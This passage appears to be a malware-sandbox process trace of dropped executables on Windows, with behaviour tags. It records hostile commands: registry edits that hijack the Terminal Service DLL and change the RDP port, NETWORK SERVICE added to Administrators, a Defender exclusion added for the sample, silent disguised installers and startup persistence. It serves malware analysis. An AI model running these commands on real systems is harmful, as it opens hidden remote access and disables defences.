C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3F5C.tmp" "c:\Users\Admin\AppData\Local\Temp\qvqav023\CSC910D04A1CFB74B189A724FDF7928163.TMP"4⤵PID:1560
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3860
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵PID:4960
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵PID:4972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:4544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:4600
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:4628
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵PID:4824
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:4852
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵PID:4908
-
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵PID:4456
-
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵PID:4916
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:4340
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:4992
-
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵PID:4924
-
C:\Windows\SysWOW64\net.exenet start TermService5⤵PID:5024
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:5044
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:2772
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:4988
-
-
-
C:\Users\Admin\AppData\Local\Temp\17A2.exeC:\Users\Admin\AppData\Local\Temp\17A2.exe1⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Users\Admin\AppData\Local\Temp\9dac25bf-828f-494e-be2f-32046ec357c3\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\9dac25bf-828f-494e-be2f-32046ec357c3\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\9dac25bf-828f-494e-be2f-32046ec357c3\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Users\Admin\AppData\Local\Temp\9dac25bf-828f-494e-be2f-32046ec357c3\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\9dac25bf-828f-494e-be2f-32046ec357c3\AdvancedRun.exe" /SpecialRun 4101d8 23283⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3920
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\17A2.exe" -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3840
-
-
C:\Users\Admin\AppData\Local\Temp\17A2.exe"C:\Users\Admin\AppData\Local\Temp\17A2.exe"2⤵
- Executes dropped EXE
PID:2360
-
-
C:\Users\Admin\AppData\Local\Temp\17A2.exe"C:\Users\Admin\AppData\Local\Temp\17A2.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2512
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 22002⤵
- Drops file in Windows directory
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2240
-
-
C:\Users\Admin\AppData\Local\Temp\4952.exeC:\Users\Admin\AppData\Local\Temp\4952.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management 1.7.3.2\install\97C955F\adv.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\4952.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632871995 " AI_EUIMSI=""2⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:4648
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4276 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3EEAA976552A483B3E3EF6D886ECBA20 C2⤵
- Loads dropped DLL
PID:4444
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 174C41CFE0FB8E18375AF88AF883D32B2⤵
- Loads dropped DLL
PID:4936
-
-
C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management\disksyncer.exe"C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management\disksyncer.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Loads dropped DLL
- Adds Run key to start application
PID:4388 -
C:\ProgramData\Zenar_protected\Zenar_protected.exe"C:\ProgramData\Zenar_protected\Zenar_protected.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2892
-
-
-
C:\Users\Admin\AppData\Local\Temp\6528.exeC:\Users\Admin\AppData\Local\Temp\6528.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4112 -
C:\Users\Admin\AppData\Local\Temp\is-621I7.tmp\6528.tmp"C:\Users\Admin\AppData\Local\Temp\is-621I7.tmp\6528.tmp" /SL5="$80118,4844586,831488,C:\Users\Admin\AppData\Local\Temp\6528.exe"2⤵
- Executes dropped EXE
PID:4148 -
C:\Users\Admin\AppData\Local\Temp\6528.exe"C:\Users\Admin\AppData\Local\Temp\6528.exe" /VERYSILENT3⤵
- Executes dropped EXE
PID:4320 -
C:\Users\Admin\AppData\Local\Temp\is-8L012.tmp\6528.tmp"C:\Users\Admin\AppData\Local\Temp\is-8L012.tmp\6528.tmp" /SL5="$90118,4844586,831488,C:\Users\Admin\AppData\Local\Temp\6528.exe" /VERYSILENT4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:4408 -
C:\Users\Admin\AppData\Roaming\SketchLib SDK Client\SketchClient.exe"C:\Users\Admin\AppData\Roaming\SketchLib SDK Client\SketchClient.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4920
-
-
-
-